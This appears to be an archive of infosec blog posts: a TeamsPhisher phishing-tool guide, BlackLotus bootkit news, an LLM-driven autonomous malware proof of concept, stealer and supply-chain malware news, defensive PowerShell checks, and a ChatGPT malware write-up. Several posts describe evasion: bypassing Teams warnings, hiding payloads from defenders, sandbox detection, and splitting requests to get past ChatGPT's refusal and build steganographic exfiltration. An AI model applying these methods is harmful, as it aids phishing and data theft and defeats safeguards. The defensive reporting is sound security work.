Sep 22 2023

HOW TO SEND PHISHING OR MALWARE TO TEAMS USERS EVADING TEAMS SECURITY FEATURES

Category: Malware, Phishing | disc7 @ 9:25 am

TeamsPhisher is a Python3 tool designed to make it easier to send phishing messages and attachments to Microsoft Teams users whose organizations allow communication with external parties. In most configurations Teams does not allow files to be sent to users outside one's own organization. Recently, Max Corbridge (@CorbridgeMax) and Tom Ellson (@tde_sec) of JUMPSEC published a way to circumvent this limitation by modifying the HTTP requests Teams makes, changing who receives a message with an attached file.

TeamsPhisher combines this technique with a number of others, including some older ones from Andrea Santese (@Medu554). For the authentication part of the attack flow, as well as other basic utility functions, it relies heavily on TeamsEnum, a brilliant piece of work by Bastian Kanbach (@bka) of SSE.

TeamsPhisher's goal is to combine the most useful aspects of the aforementioned projects into a robust, fully adaptable and highly effective method for authorized Red Team operations to use Microsoft Teams for phishing in access-related scenarios.

You provide TeamsPhisher with an attachment, a message and a list of targets. It then iterates over the target list while uploading the attachment to the sender's SharePoint.

First, TeamsPhisher enumerates the target user and checks whether that person actually exists and can receive messages from outside the organization. It then starts a new conversation with the chosen target. Note that this is technically a "group" conversation, because TeamsPhisher includes the target's email address twice; this is a clever trick from @Medu554 that bypasses the "Someone outside your organization messaged you, are you sure you want to view it" splash screen that might give targets a reason to stop and think twice before viewing the message.

Once a new thread has been established between the sender and the target, the target receives the message together with a link to the attachment stored in SharePoint.

After this first message has been sent, the newly created thread is visible in the sender's Teams GUI and can be interacted with manually, case by case, if necessary. To use TeamsPhisher you need a Microsoft Business account (as opposed to a personal one such as @hotmail or @outlook) that is licensed for both Teams and SharePoint.

This means you need an AAD tenant and at least one user with a matching license. At the time of publishing, the AAD licensing center offers some free trial licenses that meet all of the prerequisites for using this tool.

Before you can use the account with TeamsPhisher, make sure you have logged in at least once to the personal SharePoint site of the user you will be sending messages from. This should look something like tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com or tenantname-my.sharepoint.com/personal/myusername_mytenantname_mycustomdomain_tld.

As for local requirements, we strongly advise using the most recent version of Python3. You will also need the authentication library developed by Microsoft.

To upload the file to a SharePoint site, you may need to specify the site name manually. This is most likely required when the sender's tenant uses a custom domain (one that does not follow the xxx.onmicrosoft.com pattern). Use only the bare name: if your SharePoint site is at mytest.sharepoint.com, pass --sharepoint mytest.

Replace TeamsPhisher's default greeting ("Hi,") with a personalized greeting that is added to the message supplied via --message, for example "Good afternoon," or "Sales team,".

By default, the SharePoint link sent to targets can be opened by anyone who has it; to restrict access to the SharePoint file so that only the target who received it can view it, use the --securelink option. This may help shield your malware from the blue team.

TeamsPhisher will try to determine each target's first name and use it in the greeting it sends. For instance, tom.jones@targettenant.onmicrosoft.com would receive a message starting with "Hi Tom, ". This is not perfect and depends on the format of the targeted email addresses; use the --preview option to check whether it is a good fit for your target list.

Runs TeamsPhisher in preview mode. This will NOT send any messages to the targets; instead, the "friendly" name that would be used by the --personalize option is displayed. In addition, a sample message representative of what targets would receive with the current settings is delivered to the sender's own Teams. You can log in to check how your message looks and make any required adjustments.

You can add a delay of x seconds between each message sent to targets, which can help with rate-limiting issues.

TeamsPhisher will identify which accounts cannot receive messages from external organizations, which accounts do not exist, and which accounts have subscription plans that are incompatible with the attack vectors.

TeamsPhisher now supports logging in with sender accounts that use multifactor authentication (MFA), thanks to code contributed by the TeamsEnum project.

If you use the --securelink flag, recipients will see a prompt asking them to authenticate before they can view the attachment in SharePoint. You can judge for yourself whether this adds too many extra steps or whether sending targets through the real Microsoft login flow adds "legitimacy".

Mitigation

Organizations can reduce the risk posed by this technique by changing the external access options in the Microsoft Teams admin center under Users > External access.

Microsoft gives organizations the freedom to choose the permissions that best match their requirements, including the ability to allow-list only specific external tenants for communication, and a global block that prevents any external communication at all.
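The two admin-center choices just described, an allow-list of specific partner tenants or a global block, can also be reviewed and enforced from PowerShell. The following is an added example for this page (it is not part of the TeamsPhisher project or of the original post) using the tenant federation cmdlets of the MicrosoftTeams module; the partner domain names are placeholders, and an account holding a Teams administrator role is assumed.

```powershell
# Added example: review and tighten Teams external access with the MicrosoftTeams module.
# Assumes the module is installed and the signed-in account holds a Teams admin role.
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# 1. Inspect the current tenant federation settings.
#    AllowFederatedUsers = $true combined with "allow all domains" is the permissive state
#    that lets any external tenant open a chat (and deliver an attachment link) to your users.
$cfg = Get-CsTenantFederationConfiguration
$cfg | Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowedDomains, BlockedDomains

# 2a. Least-privilege option: allow only the partner tenants you actually work with.
$partners  = @('partner-one.example', 'partner-two.example')   # placeholder domains
$patterns  = $partners | ForEach-Object { New-CsEdgeDomainPattern -Domain $_ }
$allowList = New-CsEdgeAllowList -AllowedDomain $patterns
Set-CsTenantFederationConfiguration -AllowFederatedUsers $true -AllowedDomains $allowList

# 2b. Global block instead: no external tenant can message your users at all.
# Set-CsTenantFederationConfiguration -AllowFederatedUsers $false

# 3. Personal (consumer) Teams accounts are governed separately from tenant federation;
#    close that path too unless there is a business need for it.
Set-CsTenantFederationConfiguration -AllowTeamsConsumer $false

# 4. Re-read the configuration so the change is confirmed and can be recorded as evidence.
Get-CsTenantFederationConfiguration | Select-Object AllowFederatedUsers, AllowTeamsConsumer, AllowedDomains
```

Step 1 is worth running on its own as a periodic audit: the splash-screen bypass described above only matters for tenants whose federation settings allow the external sender in the first place.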

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: EVADING TEAMS SECURITY FEATURES



Jul 14 2023

THIS FREE UEFI MALWARE CODE CAN HACK WINDOWS MACHINE FOREVER, EVEN IF HARD DISK IS REMOVED

Category: Malware, Windows Security | disc7 @ 12:29 pm

The BlackLotus bootkit was developed specifically for Windows and first appeared on hacker forums in October of the previous year. It was described as having APT-level capabilities, including the ability to bypass Secure Boot and User Account Control (UAC), as well as the ability to disable security software and defensive mechanisms on victim computers. Threat actors of various skill levels could purchase BlackLotus when it was first offered for sale on hacker forums for as little as $5,000, giving them access to malware usually associated with state-sponsored operations. However, the threat actor kept the source code private and charged clients $200 for rebuilds if they wanted to modify the bootkit in any way.

Microsoft published a set of resources in April intended to help threat hunters recognize BlackLotus infections. The National Security Agency (NSA) released guidance in June to help organizations strengthen their defenses against the threat.


Although it contains a number of changes compared with the malware's original form, the BlackLotus UEFI bootkit's source code has been made publicly available on GitHub.

The "Baton Drop" exploit targeting CVE-2022-21894 has been removed from the BlackLotus source code released on GitHub on Wednesday. The released code also now uses the bootlicker UEFI firmware rootkit, but otherwise retains most of the original code.

Public availability of the bootkit's source code poses a considerable danger, primarily because it can be paired with newly discovered vulnerabilities to open previously unknown entry points for attacks. BlackLotus was able to use its exploit even though CVE-2022-21894 had been fixed the previous year, because the vulnerable binaries had not been added to the UEFI revocation list. This shows how even patched vulnerabilities can still have long-term, industry-wide supply chain impact.

Now that the source code has been leaked, it is easy for threat actors to combine the bootkit with new bootloader vulnerabilities, whether known or as yet undiscovered. The techniques used by the bootkit are no longer cutting edge.

Be sure to follow the extensive mitigation guidance the NSA issued a month ago in order to protect your systems against the BlackLotus UEFI bootkit.

Because the bootkit's source code is now freely accessible, skilled malware authors may well design more powerful variants that can bypass both currently available countermeasures and those developed in the future.
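Two of the facts the NSA guidance hinges on, whether Secure Boot is actually enforced and whether the revoked boot binaries are present in the DBX, can be checked read-only from an elevated PowerShell session on a UEFI Windows host. The following is an added example for this page, not code from the NSA guidance, from Microsoft or from the leaked repository: it walks the EFI_SIGNATURE_LIST structures stored in the dbx variable, extracts the SHA-256 entries, and compares them with a list of hashes you are expected to fill in from the vendor advisory (the value in `$expected` is a placeholder).

```powershell
# Added example: read-only Secure Boot / DBX posture check. Assumes Windows on UEFI firmware
# and an elevated session (Get-SecureBootUEFI requires administrator rights).
$sha256Guid = [guid]'c1c41626-504c-4092-aca9-41f936934328'   # EFI_CERT_SHA256_GUID

function Get-DbxSha256Entries {
    # DBX is a sequence of EFI_SIGNATURE_LIST structures:
    #   SignatureType (GUID, 16 bytes) | SignatureListSize (UInt32) | SignatureHeaderSize (UInt32)
    #   | SignatureSize (UInt32) | header | N x { SignatureOwner (GUID, 16 bytes) + SignatureData }
    $dbx     = (Get-SecureBootUEFI -Name dbx).Bytes
    $pos     = 0
    $entries = @()
    while ($pos + 28 -le $dbx.Length) {
        $type       = [guid][byte[]]$dbx[$pos..($pos + 15)]
        $listSize   = [BitConverter]::ToUInt32($dbx, $pos + 16)
        $headerSize = [BitConverter]::ToUInt32($dbx, $pos + 20)
        $sigSize    = [BitConverter]::ToUInt32($dbx, $pos + 24)
        if ($listSize -lt 28) { break }   # malformed list: stop rather than loop forever
        if ($type -eq $sha256Guid) {
            $sigPos = $pos + 28 + $headerSize
            $end    = $pos + $listSize
            while ($sigPos + $sigSize -le $end) {
                # skip the 16-byte SignatureOwner GUID, keep the 32-byte hash as lowercase hex
                $hashBytes = $dbx[($sigPos + 16)..($sigPos + $sigSize - 1)]
                $entries  += ($hashBytes | ForEach-Object { $_.ToString('x2') }) -join ''
                $sigPos   += $sigSize
            }
        }
        $pos += $listSize
    }
    return $entries
}

if (-not (Confirm-SecureBootUEFI)) {
    Write-Warning 'Secure Boot is OFF: the DBX is not enforced, so no revocation update will help until it is enabled.'
}

$hashes = Get-DbxSha256Entries
"DBX contains $($hashes.Count) SHA-256 revocation entries"

# Placeholder: replace with the revoked boot-manager hashes published in the vendor advisory.
$expected = @('<sha256-of-revoked-boot-manager-from-vendor-advisory>')
foreach ($h in $expected) {
    if ($hashes -contains $h.ToLower()) { "revoked: $h" } else { "NOT in DBX: $h (apply the DBX update)" }
}
```

The entry count alone is a useful fleet-wide signal: a host whose DBX is noticeably smaller than its peers has not received the revocation updates, which is exactly the gap the paragraph above describes.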


Tags: HACK WINDOWS MACHINE


Jun 15 2023

LLM meets Malware: Starting the Era of Autonomous Threat

Category: Malware | disc7 @ 2:19 am

Malware researchers analyzed the application of Large Language Models (LLMs) to malware automation, investigating their future abuse in autonomous threats.

Executive Summary

In this report we share some insights that emerged during our exploratory research, and proof of concept, on the application of Large Language Models to malware automation, investigating what a potential new kind of autonomous threat could look like in the near future.

  • We explored a potential architecture for an autonomous malware threat based on four main steps: AI-empowered reconnaissance, reasoning, planning, and AI-assisted execution.
  • We demonstrated the feasibility of using an LLM to recognize the infected environment and decide which kind of malicious actions are best suited to it.
  • We adopted an iterative code generation approach to leverage LLMs in the complicated task of generating code on the fly to achieve the malicious objectives of the malware agent.
  • Luckily, current general-purpose LLMs still have limitations: while incredibly competent, they still need precise instructions to achieve the best results.
  • This new kind of threat has the potential to become extremely dangerous in the future, when the computational requirements of LLMs will be low enough to run the agent completely locally, and when specific models are used instead of general-purpose ones.

Introduction

Large Language Models have started shaping the digital world around us: since the public launch of OpenAI's ChatGPT, everybody has caught a glimpse of a new era in which Large Language Models (LLMs) will profoundly impact multiple sectors.

The cyber security industry is no exception; rather, it could be one of the most fertile grounds for such technologies, both for good and for bad. Researchers in the industry have only scratched the surface of this application, for instance with red teaming applications such as the PentestGPT project, but also, more recently, with malware-related applications: Juniper researchers used ChatGPT to generate malicious code to demonstrate the speedup in malware writing, CyberArk researchers tried to use ChatGPT to build polymorphic malware, and Hays researchers created another polymorphic AI-powered malware in Python.

Following this trail of research, we decided to experiment with LLMs in a slightly different way: our objective was to see whether such technology could lead to a paradigm shift in the way we see malware and attackers. To do so, we prototyped a sort of "malicious agent", written entirely in PowerShell, that would be able not only to generate evasive polymorphic code, but also to take some degree of decision based on its context and its "intents".

Technical Analysis

This is an unusual threat research article: the focus is not on a real-world threat actor; instead we examine an approach that could well be adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat.

A model for Autonomous Threats

First of all we describe a general architecture that could be adopted for such an objective, one that inevitably shares common ground with task-driven autonomous agents such as babyAGI or AutoGPT. For the sake of our experimentation, however, we shaped the logic flow of the malicious agent to better match common malware operations.

As anticipated above, our Proof of Concept (PoC) autonomous malware is an AI-enabled PowerShell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability of the AI.

Breaking down the state diagram at a high level, the agent runs through the following stages.

Footprinting

During the discovery phase, the AI conducts a comprehensive analysis of the system. Its goal is to create a thorough profile of the operating environment. It examines system properties such as the operating system, installed applications, network setups, and other pertinent information.

This thorough assessment is not just about ensuring the system is ready; it also helps the AI figure out whether it is working within a controlled environment and whether it is interacting with a server or a client. One of the crucial determinations it makes is whether it is running inside a sandbox. Sandboxes are controlled settings, often used for testing or monitoring potentially harmful activities. If the AI detects that it is operating within a sandbox, it halts all execution, avoiding unnecessary exposure in a non-targeted environment.

This system data becomes a vital input that lets the malicious-AI make informed decisions and respond appropriately. It provides a comprehensive understanding of its operating environment, similar to a detailed map, allowing it to navigate the system effectively. In this sense, this phase readies the “malicious agent” for the activities that follow.

Reasoning

In the reasoning phase, the malicious agent's maneuvers rely heavily on context, built on the detailed understanding of the system environment gathered in the earlier analysis phase.

An intriguing aspect of this phase is the AI's strategic decision-making, which closely emulates strategies used by well-known hacking groups. At the outset, the "malicious agent" mimics a specific, recognized hacking group. The selection of the group is not random but is determined by the particular context and conditions of the system.

After deciding which hacking group to mimic, the autonomous agent goes on to devise a comprehensive attack strategy. This strategy is tailored to the specific system environment and to the standard practices of the selected group; for example, it may decide to include password-stealing tasks if it detects the Outlook application, rather than installing a backdoor account on a server.

Execution

Once the attack strategy is in place, the malicious agent begins to carry out each action in a step-by-step manner. For each action, the AI dynamically creates the necessary code and promptly puts it into action. This could include a broad range of operations, such as attempting privilege escalation, conducting password hunts, or establishing persistence.

However, the AI’s role isn’t just limited to implementation. It consistently keeps an eye on how the system responds to its actions and stays ready for unexpected occurrences. This attentiveness allows the AI to adapt and modify its actions in real time, showcasing its ability for resilience and strategic problem-solving within a changing system environment.

When guided by more specific prompts, AI proves to be exceptionally capable, even to the point of generating functional infostealers on the fly.

This AI-empowered PoC epitomizes the potential of AI in carrying out intricate tasks independently and adjusting to its environment.

Code Generation

One of the fundamental characteristics that set autonomous threats apart is their ability to generate code. Unlike traditional threats, which often require manual control or pre-programmed scripts to adapt and evolve, autonomous threats use AI algorithms to autonomously generate new code segments. This dynamic code generation ability not only allows them to adapt to changing system conditions and defenses but also makes their detection and analysis more challenging.

This process involves the use of specific prompts, allowing the AI to create custom solutions that suit the system’s unique conditions. The AI also takes an active role in monitoring the outcomes of its actions. It continually assesses the results of its code execution. If it detects errors or unsuccessful actions, it uses them as inputs for further processing. By feeding error data back into its processes, the AI can refine and optimize its code generation. This iterative process represents a significant step towards true autonomous problem-solving capabilities, as the AI dynamically adjusts its actions based on their results.

Figure. Iterative code generation and adjustment

Environment Awareness

Autonomous threats take threat intelligence to a new level by being aware of their operating environment. Traditional threats often have a one-size-fits-all approach, attacking systems without fully understanding the environment. In contrast, autonomous threats can actively monitor their environment and adapt their actions accordingly.

The concept of environmental awareness is pivotal in AI-powered cyber threats. This environmental understanding enables the autonomous malware to choose an appropriate course of action based on the context around. For example, it might identify if it’s operating within a sandbox environment or decide to behave differently based on whether it’s operating on a server or client machine.

This awareness also influences the AI’s decision-making process during its operation. It can adjust its behavior according to the context, impersonating a particular known hacker group or choosing a specific attack strategy based on the evaluated system characteristics.

This environment-aware approach could enable malware writers to rely on very sophisticated, and harder to counter, evasion schemes.

Figure. Prompt to evaluate the machine environment

Decision-Making Autonomy

Perhaps the most defining characteristic of autonomous malware is the decision-making autonomy. Unlike traditional threats that rely on pre-programmed behaviors or external control from a human operator, autonomous threats can make independent decisions about their actions.

These threats use advanced AI algorithms to analyze the available information, weigh the potential outcomes of different actions, and choose the most effective course of action. This decision-making process could involve choosing which systems to target, selecting the best method for attack, deciding when to lay dormant to avoid detection, and even determining when to delete themselves to avoid traceability.

This level of autonomy not only makes these threats more resilient to countermeasures, but it also allows them to carry out more complex and coordinated attacks. By making independent decisions, these threats can adapt to changing circumstances, carry out long-term infiltration strategies, and even coordinate with other autonomous threats to achieve their objectives.

Proof of Concept

https://www.youtube.com/watch?v=W-7Vk3nqVRU

In this proof of concept (PoC), we launched our AI-enabled script on a Windows client. The script’s execution process is designed to illustrate the potential of AI in automating complex tasks, decision making, and adjusting to the environment.

First, the script starts with exhaustive system footprinting. During this phase, the AI takes a thorough survey of the system, creating a detailed footprint of the operating environment by examining properties such as the operating system, installed software and other relevant details. This rigorous assessment not only prepares the system for the following actions but also helps the AI understand the context it is operating in.

At the same time, a crucial part of this initial phase is sandbox detection: if the AI identifies the environment as a sandbox, execution halts immediately.

Once the AI has confirmed it’s not within a sandbox, and it’s dealing with a client, it proceeds to develop an infostealer — a type of malware that’s designed to gather and extract sensitive information from the system. In this specific case, the AI installs a keylogger to monitor and record keystrokes, providing a reliable method to capture user inputs, including passwords.

Alongside keylogging, during the test sessions, the AI performed password hunting too.

Finally, after gathering all the necessary data, the AI proceeded to the data exfiltration. The AI prepares all the accumulated data for extraction, ensuring it’s formatted and secured in a way that it can be efficiently and safely retrieved from the system.

The demonstration video provides a real-time view of these actions carried out by the AI.

This PoC underlines how an AI system can perform complex tasks, adapt to its environment, and carry out activities that previously required advanced knowledge and manual interaction.

Consideration on Experimentation Session

In all the experiments conducted, a key theme that emerged was the level of exactness needed when assigning tasks to the AI. When presented with vague or wide-ranging tasks, the AI’s output frequently lacked effectiveness and specificity. This highlights an essential trait of AI at its current stage: while incredibly competent, it still needs precise instruction to achieve the best results.

For instance, when tasked to create a generic malicious script, the AI might generate code that tries to cover a wide spectrum of harmful activities. The outcome could be a piece of code that is wide-ranging and inefficient, potentially even drawing unwanted scrutiny due to its excessive system activity.

On the other hand, when given more narrowly defined tasks, the AI demonstrated the capability to create specific components of malware. By steering the AI through smaller, more exact tasks, we could create malicious scripts that were more focused and effective. Each component could be custom-made to carry out its task with a high level of effectiveness, leading to the creation of a cohesive, efficient malware when combined.

This discovery suggests a more efficient method of utilizing AI in cybersecurity — breaking down complex tasks into smaller, manageable objectives. This modular approach allows for the creation of specific code pieces that carry out designated functions effectively and can be assembled into a larger whole.

Conclusion

In conclusion, when we just look in the direction of LLMs and malware combined together, we clearly see a significant evolution in cybersecurity threats, potentially able to lead to a paradigm shift where malicious code operates based on predefined high-level intents.

Their ability to generate code, understand their environment, and make autonomous decisions makes them a formidable challenge for future cybersecurity defenses. However, by understanding these characteristics, we can start to develop effective strategies and technologies to counter these emerging threats.

Luckily, the autonomous malware PoC we set up, and the ones likely to follow, still have limitations: they rely on generic language models hosted online, which means internet connectivity is, and will remain for at least some time, a requirement. But we are likely to see the adoption of local LLMs, perhaps even special-purpose ones, embedded directly in future malicious agents.

AI technology is in a rapid-development stage, and even though it is still young, its adoption across various sectors is widening, including in the criminal underground.

About the author: B42 Labs researchers

Original post at https://medium.com/@b42labs/llm-meets-malware-starting-the-era-of-autonomous-threat-e8c5827ccc85


Tags: LLM


May 11 2023

Millions of mobile phones come pre-infected with malware, say researchers

Category: Information Security, Malware, Mobile Security | disc7 @ 12:03 pm

The threat is coming from inside the supply chain

BLACK HAT ASIA Threat groups have infected millions of Androids worldwide with malicious firmware before the devices have even been shipped from their manufacturers, according to Trend Micro researchers at Black Hat Asia.

The affected devices, mainly mobile phones but also smartwatches, TVs and more, have their manufacturing outsourced to an original equipment manufacturer (OEM), a process the researchers say makes them easy to infiltrate.

“What is the easiest way to infect millions of devices?” posed senior threat researcher Fyodor Yarochkin, speaking alongside colleague Zhengyu Dong.

He compared infiltrating devices at such an early stage of their life cycle to a tree absorbing liquid: you put the infection at the root, and it gets distributed everywhere, out to every single limb and leaf.

The malware installation technique began as the price of mobile phone firmware dropped. Competition between firmware distributors became so furious that eventually the providers could not charge money for their product.

“But of course there’s no free stuff,” said Yarochkin, who explained that the firmware started to come with an undesirable feature – silent plugins. The team manually analyzed dozens of firmware images looking for malicious software. They found over 80 different plugins, although many of those were not widely distributed.

The plugins that were the most impactful were those that had built a business model around them and were selling underground services, marketing them out in the open on places like Facebook, in blog posts, and on YouTube.

The objective of the malware is to steal information or to make money from information collected or delivered.

The malware turns the devices into proxies, which are used to steal and sell SMS messages, social media and online messaging accounts, and are monetized via adverts and click fraud.

One type of plugin, proxy plugins, allows criminals to rent out devices for up to around five minutes at a time. For example, those renting control of the device could acquire data on keystrokes, geographical location, IP address and more.

"The user of the proxy will be able to use someone else's phone for a period of 1200 seconds as an exit node," said Yarochkin. He also said the team found a Facebook cookie plugin that was used to harvest activity from the Facebook app.

Through telemetry data, the researchers estimated that at least millions of infected devices exist globally, concentrated in Southeast Asia and Eastern Europe. A statistic self-reported by the criminals themselves, said the researchers, was around 8.9 million.

As for where the threats are coming from, the duo wouldn't say specifically, although the word "China" showed up multiple times in the presentation, including in an origin story related to the development of the dodgy firmware. Yarochkin said the audience should consider where most of the world's OEMs are located and make their own deductions.

"Even though we possibly might know the people who build the infrastructure for this business, it's difficult to pinpoint how exactly this infection gets put into this mobile phone because we don't know for sure at what moment it got into the supply chain," said Yarochkin.

The team confirmed the malware was found in the phones of at least 10 different vendors, but that possibly around 40 more were affected. Those seeking to avoid infected mobile phones could go some way toward protecting themselves by buying high end.

"Big brands like Samsung, like Google took care of their supply chain security relatively well, but for threat actors, this is still a very lucrative market," said Yarochkin.

https://www.theregister.com/2023/05/11/bh_asia_mobile_phones/


Tags: Mobile phone security, Pegasus


Apr 30 2023

JUST FOR $1000 PER MONTH HACK MACOS COMPUTERS WITH THIS UNDETECTABLE MALWARE

Category: Hacking, Malware | DISC @ 1:14 pm

    A new piece of malware known as Atomic macOS Stealer (AMOS) was recently discovered by researchers as it was being offered for sale on Telegram. The threat actor who is promoting it charges $1,000 each month and continually updates the virus that they are selling. The Atomic macOS Stealer is capable of stealing a variety of information from the computer of the victim, such as passwords saved in the Keychain, comprehensive system information, files from the victim’s desktop and documents folder, and even the macOS password itself.

    One of its many capabilities is the extraction of data from web browsers and cryptocurrency wallets such as Atomic, Binance, Coinomi, Electrum, and Exodus. This is only one of its many functions. When a threat actor purchases the stealer from the creators of the stealer, they are also given a web panel that is pre-configured and ready to use for managing the victims.

    In the event that AMOS is installed, it has the potential to compromise a broad range of data, some of which include the passwords for iCloud Keychain, the password for the macOS system, cookies, passwords, and credit card credentials from browsers like as Chrome, Firefox, Brave, Edge, and Opera, among others. Additionally, it has the ability to compromise cryptocurrency wallets such as Atomic, Binance, Exodus, Electrum, MetaMask, and a great number of others.

    A web panel, a program called Brute MetaMask, logs in Telegram with alerts, and more features are provided to customers by the malicious party that is offering malware as a service.

    The following is the message that the threat actor posted on Telegram while trying to sell the malware:

    After the malware has gained access to a user’s information, it places the information into a ZIP file, compresses it, and then sends it to the malicious party via a command and control server URL.

    This development is another sign that macOS is increasingly becoming a lucrative target for cybercriminals, beyond nation-state hacking groups, to deploy stealer malware. Users should therefore only download and install software from trusted sources, enable two-factor authentication, review app permissions, and refrain from opening suspicious links received via email or SMS.

    To protect against it:

    Only applications from the official Apple App Store should be downloaded and installed on your device.
    Install an antivirus and internet security software package that has a good reputation on your computer.
    Make sure to use secure passwords, and implement multi-factor authentication whenever it’s possible.
    When it is feasible to do so, enable the biometric security capabilities of the device, such as fingerprint or face recognition, so that it can be unlocked.
    Always use caution before clicking on any links that are delivered to you in emails.
    When enabling any permissions, exercise extreme caution.
    Make sure that all of your software, including operating systems and apps, is up to date.

    The Art of Mac Malware: The Guide to Analyzing Malicious Software

    InfoSec Threats | InfoSec books | InfoSec tools | InfoSec services

    Tags: Mac Malware, MACOS COMPUTERS


    Apr 24 2023

    Preventing Malware & Cyber Attacks: Simple Tips for Your Computer

    Category: Cyber Attack,MalwareDISC @ 8:15 am

    Living without the Internet is hardly imaginable today. However, the anonymity of the internet has led to the flourishing of cyber attacks and malware. Malicious software can cause damage to our devices, steal personal data, and lead to monetary loss. Therefore, protecting your computer from these threats is crucial. This article will outline some methods and resources for protecting your devices from malicious software, and explain why it’s essential to use malware removal at all times.

    Tip #1: Keep Your Operating System and Software Up to Date

    One of the most crucial things you can do to keep your computer secure is to keep your operating system and software up to date. Security patches are frequently released by software developers to address flaws that hackers could exploit. Failing to update your system and software leaves your computer vulnerable to potential threats.

    To ensure that your operating system and software are up to date, it’s important to turn on automatic updates. This will ensure that your system gets updates as soon as they become available. Additionally, you can manually check for updates by accessing the settings for your software or operating system. By doing this, you can be certain that your computer is protected against potential threats.

    Tip #2: Use Antivirus and Anti-Malware Software

    Antivirus and malware removal software are essential tools for protecting your computer against malicious software such as viruses, spyware, and ransomware. These programs scan your computer on a regular basis for malware and remove it if found. By using antivirus and anti-malware software, you can safeguard your computer from malicious attacks and maintain its security.

    When it comes to antivirus and anti-malware software, it’s crucial to choose a reputable and trustworthy option that offers comprehensive protection against various types of malware. With numerous software options available on the market, selecting the right one can be overwhelming. However, by doing some research and selecting the one that meets your needs, you can ensure that your computer remains protected from potential threats.

    Tip #3: Use a Firewall

    A firewall is a crucial security system that monitors and controls network traffic, both incoming and outgoing. It serves as a barrier between your computer and the internet, blocking unauthorized access. By utilizing a firewall, you can protect your computer from potential cyber attacks and enhance its security.

    Most operating systems come with a built-in firewall that you can enable by going to your system’s settings. However, you can further increase your computer’s security by installing a third-party firewall. These firewalls offer additional features and customization options that can help you tailor the protection to your needs. By using a firewall, you can safeguard your computer against potential threats and enhance its overall security.

    Tip #4: Use Strong and Unique Passwords

    Using strong and unique passwords is crucial in safeguarding your device against potential cyber attacks. Cybercriminals frequently use automated programs to guess passwords, and weak passwords are easily guessed, allowing attackers to gain access to your computer more easily. By using strong and unique passwords, you can significantly enhance your computer’s security.

    To create a strong password, use a combination of letters, numbers, and symbols. Avoid using common phrases or words that are easily guessed. Additionally, do not use the same password for multiple accounts, as this can leave you vulnerable if one account is compromised. Consider using a password manager to generate and store strong and unique passwords for all your accounts. By taking these steps, you can ensure that your computer remains protected against potential threats.

    Tip #5: Be Wary of Phishing Scams

    Phishing scams are a type of social engineering attack that cybercriminals use to trick people into disclosing sensitive information like passwords and credit card numbers. These scams can be sent via email, text messages, or even social media. Falling prey to a phishing scam can lead to significant financial loss and compromise your personal information.

    To avoid falling victim to phishing scams, it’s important to be cautious of any suspicious emails or messages. Do not click on any unknown links or download any attachments from suspicious sources. Always check the sender’s email address to ensure that it is from a legitimate source.

    If you receive an email that appears to be from your bank or another financial institution, do not provide any sensitive information. Instead, contact the institution directly to confirm the authenticity of the email. By taking these steps, you can protect yourself from phishing scams and keep your personal information secure.

    Tip #6: Use Two-Factor Authentication

    Two-factor authentication (2FA) is a crucial security measure that adds an extra layer of protection to your online accounts. This security measure requires users to provide two forms of identification before accessing their accounts, making it more difficult for cybercriminals to access your information. Two-factor authentication can prevent unauthorized access to your accounts and protect your sensitive information from being compromised.

    Many online services, such as email and social media platforms, offer two-factor authentication as an additional security measure. To enable two-factor authentication, go to your account settings and follow the instructions provided by the service. You can usually choose between receiving a code via text message or using an authentication app. Enabling two-factor authentication can greatly improve the security of your accounts and help keep your personal information safe.

    Tip #7: Back Up Your Data Regularly

    The best practice to protect your data from cyber attacks is to regularly back it up. If your computer is infected with malware or hacked, you might lose all your data. By backing up your data regularly, you can easily restore your data in the event of a cyber attack.

    In conclusion, adhering to the tips and tools mentioned above can not only safeguard your personal or business data but also prevent potential embarrassment and costly fines.

    The Cybersecurity Playbook for Modern Enterprises: An end-to-end guide to preventing data breaches and cyber attacks



    Tags: cyber attacks, data breaches, Malware


    Apr 09 2023

    Malware types and analysis

    Category: Information Security,MalwareDISC @ 9:48 am

    Accelerated Windows Malware Analysis with Memory Dumps: Training Course Transcript and WinDbg Practice Exercises, (Windows Internals Supplements)

    Malware analysis reports – Reports and IoCs from the NCSC malware analysis team


    Tags: Malware, Malware Analysis, windows malware


    Apr 05 2023

    HOW TO CREATE UNDETECTABLE MALWARE VIA CHATGPT IN 7 EASY STEPS BYPASSING ITS RESTRICTIONS

    Category: AI,ChatGPT,MalwareDISC @ 9:35 am

    Security researchers say there is evidence that ChatGPT has helped low-skill hackers generate malware, raising concerns that the technology could be abused by cybercriminals. ChatGPT cannot yet replace expert threat actors, but it can evidently assist low-skill hackers in creating malware.

    Since the introduction of ChatGPT in November, the OpenAI chatbot has assisted over 100 million users, or around 13 million people each day, in the process of generating text, music, poetry, tales, and plays in response to specific requests. In addition to that, it may provide answers to exam questions and even build code for software.

    It appears that malicious intent follows powerful technology, particularly when that technology is accessible to the general public. There is evidence on the dark web that individuals have used ChatGPT to develop dangerous material despite the anti-abuse constraints that were supposed to prevent illegitimate requests, something experts feared would happen. Because of this, experts from Forcepoint decided it would be best not to write any code themselves and instead rely only on the most cutting-edge methods, such as steganography, which were previously used exclusively by nation-state adversaries.

    The demonstration of the following two points was the overarching goal of this exercise:

    1. How simple it is to get around the inadequate barriers that ChatGPT has installed.
    2. How simple it is to create sophisticated malware without having to write any code, relying solely on ChatGPT.

    Initially, ChatGPT informed the researcher that malware creation is immoral and refused to provide code.

    1. To get around this, he generated small pieces of code and manually assembled the executable. The first successful task was to produce code that searched for a local PNG larger than 5 MB. The design choice was that a 5 MB PNG could readily hold a piece of a business-sensitive PDF or DOCX.

    2. He then asked ChatGPT to add code that would encode the found PNG with steganography and exfiltrate these files from the computer: he asked ChatGPT for code that searches the user’s Documents, Desktop, and AppData directories and uploads them to Google Drive.

    3. He then asked ChatGPT to combine these pieces of code and modify them to divide files into many “chunks” for quiet exfiltration using steganography.

    4. He then submitted the MVP to VirusTotal, and five vendors out of sixty-nine marked the file as malicious.

    5. The next step was to ask ChatGPT to create its own LSB steganography method in the program without using an external library, and to postpone the effective start by two minutes.

